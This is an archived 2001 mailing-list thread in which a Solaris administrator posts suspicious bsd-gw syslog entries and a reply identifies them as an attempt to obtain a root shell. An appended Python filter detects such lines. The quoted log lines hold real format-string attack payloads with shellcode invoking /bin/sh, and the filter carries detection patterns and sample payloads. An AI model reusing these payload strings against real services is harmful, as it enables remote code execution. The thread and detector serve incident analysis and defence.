[SunHELP] bsd-gw[910]: Invalid protocol request (66)

Dale Ghent sunhelp at sunhelp.org
Wed Apr 4 18:26:08 CDT 2001


On Wed, 4 Apr 2001, bruce beaudoin wrote:

| Hi, several hundred of these console messages (per computer) showed up
| on about half (7) of our Solaris 2.6 & 2.7 machines last night. Not all
| were at the same time and it appears that the string echoed changes for
| each instance.
| 
| Any ideas?
| Thanks,
| Bruce Beaudoin
| 
| Apr  4 00:27:11 pic bsd-gw[9108]: Invalid protocol request (66): 
| BBBXXXXXXXXXXXXXXXXXX%.72u%300$n%.106u%301$nsecurit%302$n%.1
| 92u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
| Apr  4 00:27:11 pic bsd-gw[9109]: Invalid protocol request (66): 
| BBBXXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301$nsecurity%302
| $n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh

Looks like an attempt to buffer-overflow the bsd-gw process on your server
and gain a /bin/sh shell with the permissions of the user bsd-gw runs
under (probably root).

/dale
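
An added example, not part of the original thread: a small Python filter that flags syslog lines of the form quoted above when the echoed request string contains printf-style `%n` write directives (such as `%300$n`), padded conversions, or a shell path, and counts flagged lines per host. The sample lines, host names and function names are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample lines modelled on the log format quoted in the thread
SAMPLE = """\
Apr  4 00:27:11 hosta bsd-gw[9108]: Invalid protocol request (66): BBBXXXX%.72u%300$n%.106u%301$n/bin/sh
Apr  4 00:27:12 hosta bsd-gw[9109]: Invalid protocol request (66): BBBXXXX%.168u%300$n%302$n/bin/sh
Apr  4 00:31:40 hostb bsd-gw[411]: Invalid protocol request (66): BBBXXXX%.72u%300$n
Apr  4 09:02:17 hostb bsd-gw[502]: Invalid protocol request (71): GET / HTTP/1.0
Apr  4 09:05:00 hostb sendmail[77]: some unrelated message
"""

# <timestamp> <host> <proc>[pid]: Invalid protocol request (N): <echoed request>
LINE_RE = re.compile(
    r"^\w{3}\s+\d+\s[\d:]{8}\s(?P<host>\S+)\s(?P<proc>[\w.-]+)\[(?P<pid>\d+)\]:\s"
    r"Invalid protocol request \((?P<code>\d+)\):\s*(?P<payload>.*)$"
)

# Heuristic indicators looked for in the echoed request string
CHECKS = [
    ("write-directive", re.compile(r"%(?:\d+\$)?(?:hh|h|ll|l)?n")),   # %n, %hn, %300$n
    ("padded-conversion", re.compile(r"%(?:\d+\$)?\.?\d+[udxX]")),    # %.72u, %100x
    ("shell-path", re.compile(r"/bin/(?:sh|ksh|csh|bash)\b")),
]

def classify(line):
    """Return None for unrelated lines, else host, pid and matched indicators."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    payload = m.group("payload")
    reasons = [name for name, rx in CHECKS if rx.search(payload)]
    return {"host": m.group("host"), "pid": int(m.group("pid")), "reasons": reasons}

def summarize(text):
    """Count lines per host whose echoed request holds a %n write directive."""
    hits = Counter()
    for line in text.splitlines():
        info = classify(line)
        if info and "write-directive" in info["reasons"]:
            hits[info["host"]] += 1
    return dict(hits)

if __name__ == "__main__":
    for host, count in sorted(summarize(SAMPLE).items()):
        print(f"{host}: {count} request(s) with %n directives")
```

The `write-directive` pattern is a heuristic and will also match ordinary text such as `%name`, so treat a hit as a reason to look at the line, not as proof.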